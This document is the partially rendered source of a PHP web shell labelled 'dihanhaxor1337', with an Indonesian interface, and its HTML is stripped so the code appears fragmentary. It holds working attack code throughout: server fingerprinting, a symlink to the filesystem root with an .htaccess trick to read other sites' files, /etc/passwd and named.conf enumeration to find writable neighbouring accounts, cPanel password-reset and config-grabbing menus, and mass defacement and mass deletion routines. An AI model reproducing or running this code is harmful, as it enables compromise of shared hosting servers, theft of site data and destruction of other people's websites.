|
|
dihanhaxor1337
ON" : "OFF"; $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "NONE"; $soft = $_SERVER['SERVER_SOFTWARE']; $os = PHP_OS; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } echo "SERVER IP > ".gethostbyname($_SERVER['HTTP_HOST'])."
"; echo "KERNEL > ".php_uname()."
"; echo "PERANGKAT LUNAK > ".$soft."
"; echo "SISTEM OPERASI > ".$os."
"; echo "MODE AMAN > ".$sm."
"; echo "FUNGSI MATI > ".$show_ds."
"; echo "PENGGUNA > ".$user." (".$uid.") KELOMPOK > ".$group." (".$gid.")
"; ?>
".$perm.""; } else { return "".$perm.""; } } function r($dir_raw,$perm) { if(!is_readable($dir_raw)) { return "".$perm.""; } else { return "".$perm.""; } } function perms($sdir){ $perms = fileperms($sdir); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } $dir_raw = str_replace('\\', "/", getcwd()); $host = $_SERVER['HTTP_HOST']; if($dn = $_GET['d']) { $_SESSION['dir'] = $dn; echo ""; } if(empty($_SESSION['dir'])) { $dir = $dir_raw; } else { $dir = $_SESSION['dir']; } $exp = explode("/", $dir); foreach($exp as $x=>$dirx) { if(empty($dirx)){ continue; } $do .= "
Gagal Upload ".$_FILES[dihan][name].":("; } } ?>
[ PULANG RUMAH ] [ SYMLINK ] [ LOMPAT ] [ GRAB KONFIG ] [ ADMINER ] [ MASS DEFDEL ] [ AUTO RESS CPANEL ] [ KELUAR ]
[ BUAT BERKAS ] [ BUAT FOLDER ]
permission denied"; } else { $act = ""; } } echo $act; echo ""; } elseif($_GET['filec'] == "true"){ if($_POST['new_save_file']) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = ""; } else { $act = "permission denied"; } } echo $act; echo ""; } elseif($_GET['symlink'] == "true") { if(!is_dir("dihan_sym")) { mkdir("dihan_sym"); } if(!symlink("/", "dihan_sym/root")) { echo ".: SYMLINK :."; } $hta="Options Indexes FollowSymLinks\nDirectoryIndex defacer\nAddType txt .php\nAddHandler txt .php\n"; $htaccess=fopen("dihan_sym/.htaccess", "w"); fwrite($htaccess, $hta); fclose($htaccess); echo "
"; $symlink = file_get_contents("/etc/passwd"); $lined=explode("\n", $symlink); echo "
| User | Symlink |
| $user_x[0] | Symlink | "; } echo "
";
if(preg_match("/hsphere/", $dir)) {
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo "
';
}
} elseif(preg_match("/vhosts|vhost/", $dir)) {
preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
$urls = explode("\r\n", $_POST['url']);
if(isset($_POST['jump'])) {
echo "
';
}
} else {
echo "
";
}
elseif($_GET["rcpanel"] == "true"){
echo '";
foreach($urls as $url) {
$url = str_replace(array("http://","www."), "", strtolower($url));
$etc = "/etc/passwd";
$f = fopen($etc,"r");
while($gets = fgets($f)) {
$pecah = explode(":", $gets);
$user = $pecah[0];
$dir_user = "/hsphere/local/home/$user";
if(is_dir($dir_user) === true) {
$url_user = $dir_user."/".$url;
if(is_readable($url_user)) {
$i++;
$jrw = "[R] $url_user";
if(is_writable($url_user)) {
$jrw = "[RW] $url_user";
}
echo $jrw."
";
}
}
}
}
if($i == 0) {
} else {
echo "
Total ada ".$i." Kamar di ".$ip;
}
echo "";
} else {
echo '";
foreach($urls as $url) {
$url = str_replace("www.", "", $url);
$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
if(is_dir($web_vh) === true) {
if(is_readable($web_vh)) {
$i++;
$jrw = "[R] $web_vh";
if(is_writable($web_vh)) {
$jrw = "[RW] $web_vh";
}
echo $jrw."
";
}
}
}
if($i == 0) {
} else {
echo "
Total ada ".$i." Kamar di ".$ip;
}
echo "";
} else {
echo '";
$etc = fopen("/etc/passwd", "r") or die("tidak bisa membaca /etc/passwd");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "Can't read /etc/passwd";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_dihan_jump) {
$user_jumping_dir = "/home/$user_dihan_jump/public_html";
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = "[R] $user_jumping_dir";
if(is_writable($user_jumping_dir)) {
$jrw = "[RW] $user_jumping_dir";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => ( gabisa ambil nama domain nya )
";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_dihan_jump) {
echo " => ( $dj )
";
break;
}
}
}
} else {
echo "
";
}
}
}
}
}
if($i == 0) {
} else {
echo "
Total ada ".$i." Kamar di ".$ip;
}
echo "";
}
echo ".: AUTO RESET PASSWORD CPANEL :.
'; ?> gak bisa di akses Onne-Chan
"; unlink($lokasi); $dihan = hapus_massal($dirc,$namafile); } } } } } } } function clear_fill($file,$index){ if(file_exists($file)){ $handle = fopen($file,'w'); fwrite($handle,''); fwrite($handle,$index); fclose($handle); } } function gass(){ global $dirr , $index ; chdir($dirr); $me = str_replace(dirname(__FILE__).'/','',__FILE__); $files = scandir($dirr) ; $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..","."); sort($files); $n = 0 ; foreach ($files as $file){ if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) { echo "
"; echo "
$n Kali Anda Telah Ngecrot Disini
"; } function ListFiles($dirrall) { if($dh = opendir($dirrall)) { $files = Array(); $inner_files = Array(); $me = str_replace(dirname(__FILE__).'/','',__FILE__); $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db"); while($file = readdir($dh)) { if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) { if(is_dir($dirrall . "/" . $file)) { $inner_files = ListFiles($dirrall . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dirrall . "/" . $file); } } } closedir($dh); return $files; } } function gass_all(){ global $index ; $dirrall=$_POST['d_dir']; foreach (ListFiles($dirrall) as $key=>$file){ $file = str_replace('//',"/",$file); echo "
$key Kali Anda Telah Ngecrot Disini
"; } function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $dihan = sabun_massal($dirc,$namafile,$isi_script); } } } } } } if($_POST['mass'] == 'onedir') { echo "
Versi Text Area
Versi Text
\n"; $mainpath=$_POST[d_dir];$file=$_POST[d_file]; $dir=opendir("$mainpath"); $code=base64_encode($_POST[script]); $indx=base64_decode($code); while($row=readdir($dir)){$start=@fopen("$row/$file","w+"); $finish=@fwrite($start,$indx); if ($finish){echo 'http://' . $row . '/' . $file . '
'; } } } elseif($_POST['mass'] == 'sabunkabeh') { gass(); } elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); } elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); } elseif($_POST['mass'] == 'massdeface') { echo "
";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "
"; }
else {
echo "
Folder:
Filename:
Index File:
| NAMA BERKAS | TIPE | PERM | AKSI |  ".htmlspecialchars($sdir)." |
".$dtype." | ".w("$dir/$file",perms("$dir/$file"))." | ubah nama | hapus | "; } if(is_file($dir."/".$sdir)) { echo "
|---|---|---|---|---|
 ".htmlspecialchars($sdir)." |
".$dtype." | ".w("$dir/$sdir",perms("$dir/$sdir"))." | edit | hapus |
DIAN ♥ HANNA